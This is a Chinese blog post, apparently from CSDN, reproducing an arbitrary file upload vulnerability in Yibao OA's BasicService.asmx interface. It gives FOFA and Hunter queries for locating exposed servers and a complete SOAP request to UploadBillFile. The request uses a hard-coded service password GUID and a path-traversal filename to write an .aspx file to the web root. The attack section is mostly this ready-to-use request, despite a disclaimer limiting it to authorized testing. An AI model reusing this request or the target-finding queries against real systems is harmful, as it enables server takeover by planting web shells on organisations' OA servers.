【漏洞复现】易宝OA BasicService.asmx 任意存在任意文件上传漏洞

已于 2024-03-26 20:49:52 修改
阅读量385 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-26 17:44:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137053033
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞描述

易宝OA是一款非常强大的手机办公软件,这里不仅为广大的用户提供了一个更好的工作日历,而且每个人都可以在这里进行重要事项的记录,同时软件中还拥有更好的打卡系统,让用户可以快速记录自己的工作时常,而且调班与补卡也会更加的简单,让你工作活跃度得到提升。易宝OA BasicService.asmx 存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

二、影响版本

  • 易宝OA

img

三、资产测绘

  • hunter:web.title="欢迎登录易宝OA系统"||banner="易宝OA"
  • fofa:title="欢迎登录易宝OA系统"

四、漏洞复现

POST /WebService/BasicService.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/UploadBillFile
Content-Type: text/xml;charset=UTF-8
Content-Length: 521

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:UploadBillFile>
         <!--type: base64Binary-->
         <tem:fs>aGVsbG8K</tem:fs>
         <!--type: string-->
         <tem:FileName>../../manager/hello.aspx</tem:FileName>
         <!--type: string-->
         <tem:webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</tem:webservicePassword>
      </tem:UploadBillFile>
   </soapenv:Body>
</soapenv:Envelope>

img

上传成功后访问

/hello.aspx

img

E_cho234
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
易宝OA 两处任意文件上传漏洞复现
0xSec
12-06 1060
易宝OA系统UploadFile​​​​​​​、BasicService.asmx等接口处存在文件上传漏洞,未授权的攻击者可以上传恶意后门程序执行任意代码,获取服务器权限
漏洞复现易宝OA-BasicService-文件上传
知黑而守白
03-28 124
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。易宝OA系统 BasicService 接口存在任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
易宝OA BasicService存在任意文件上传漏洞
weixin_43167326的博客
03-28 865
易宝 OA(Office Automation)是一款企业级办公自动化系统,旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具,包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等,为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强,支持多种平台和设备,可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面,为企业带来了显著的商业价值。
易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-28 514
易宝OA系统ExecuteSqlForSingle接口存在SQL注入漏洞
易宝OA系统DownloadFile接口存在文件读取漏洞
qq_36334672的博客
03-06 207
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。DownloadFile接口处存在任意文件读取漏洞,未授权的攻击者可以利用此漏洞读取系统内部敏感配置文件,数据库密钥凭证等,使系统处于极不安全的状态。
漏洞复现易宝OA UploadFile存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 693
易宝OA是一款非常强大的手机办公软件,这里不仅为广大的用户提供了一个更好的工作日历,而且每个人都可以在这里进行重要事项的记录,同时软件中还拥有更好的打卡系统,让用户可以快速记录自己的工作时常,而且调班与补卡也会更加的简单,让你工作活跃度得到提升。易宝OA UploadFile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
易宝OA 多处 SQL注入漏洞复现
0xSec
11-30 1050
易宝OA ExecuteSqlForSingle、IsPartNumber接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限
(开题)产业链视角下移动支付平台商业模式分析—以易宝支付为例.zip
09-14
(开题)产业链视角下移动支付平台商业模式分析—以易宝支付为例.zip
易宝支付产品通用接口帮助文档.7z
04-21
利用易宝支付公司的接口,开发自己的网上支付平台。易宝支付产品通用接口帮助文档,详细描述各个步骤,可学习使用。
上海易宝软件有限公司-java程序员-工资待遇.doc
12-21
上海易宝软件有限公司-java程序员-工资待遇.doc
07_传智播客在线支付_集成和测试向易宝发送支付请求.rar
04-03
07_传智播客在线支付_集成和测试向易宝发送支付请求.rar 07_传智播客在线支付_集成和测试向易宝发送支付请求.rar
易宝支付ios类文件
01-20
易宝支付的ios代码,一个类文件,post传参,参数拼接,网页加载。
网络安全攻防演练:提升应急响应能力
weixin_64392888的博客
06-14 670
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 288
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全 - ARP 欺骗原理+实验
z339521的博客
06-13 1939
APRAPR(Address Resolution Protocol)即地址解析协议,负责将某个 IP 地址解析成对应的 MAC 地址。在网络通信过程中会使用到这两种地址,逻辑 IP 地址和物理 MAC 地址,一般情况下,正常通信需要这两种地址协同工作。一个主机要和另一个主机进行直接通信,必须要知道目标主机的 MAC 地址。但这个目标 MAC 地址是如何获得的呢?就是需要通过 ARP 协议获得的。
web安全渗透测试十大常规项(一):web渗透测试之任意文件读取
HACKONE的博客
06-16 144
file、path、data、filepath、readfile、data、url、realpath等。download,down,readfile,read,del,dir,path,src,Lang等。常规下载URL:http://www.xiaodi8.com/upload/123.pdf。利用:常规下载敏感文件(数据库配置,中间件配置,系统密匙等文件信息)上传类函数,删除类函数,下载类函数,目录操作函数,读取查看函数等。文件上传,文件下载,文件删除,文件管理器等地方。2、文件删除(常出现后台中)
web安全渗透测试十大常规项(一):web渗透测试之文件包含漏洞
HACKONE的博客
06-16 63
参考:https://blog.csdn.net/unexpectedthing/article/details/121276653。url编码2次:php://filter/write=convert.base64-decode/resource=123.php。url编码2次:php://filter/write=string.rot13/resource=2.php。URL中有path、dir、file、pag、page、archive、p、eng、语言文件等相关字眼。
易宝支付 资金流水汇总查询 接入流程 csdn
02-01
易宝支付是国内知名的第三方支付平台,为商家提供了各种支付解决方案。资金流水汇总查询是易宝支付提供的重要功能,可以帮助商家快速了解自己的交易资金情况。接入流程如下: 首先,商家需要在易宝支付官网注册账号并完成实名认证,然后提交相关资料进行商户审核。 其次,商家需要在易宝支付后台创建应用并获取对应的商户号和密钥,同时设置支付回调地址和通知地址。 然后,商家需要根据易宝支付提供的开发文档,进行接口对接和调试,确保能够正常发起支付请求和接收支付通知。 接着,商家需要使用资金流水汇总查询接口,通过提交查询条件获取相应的交易数据,并对返回的数据进行处理和展示。 最后,商家需要及时监控资金流水情况,确保资金安全并及时进行对账和结算。 通过以上接入流程,商家可以顺利地使用易宝支付的资金流水汇总查询功能,方便地查看自己的交易数据,更好地管理自己的资金。希望以上回答对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值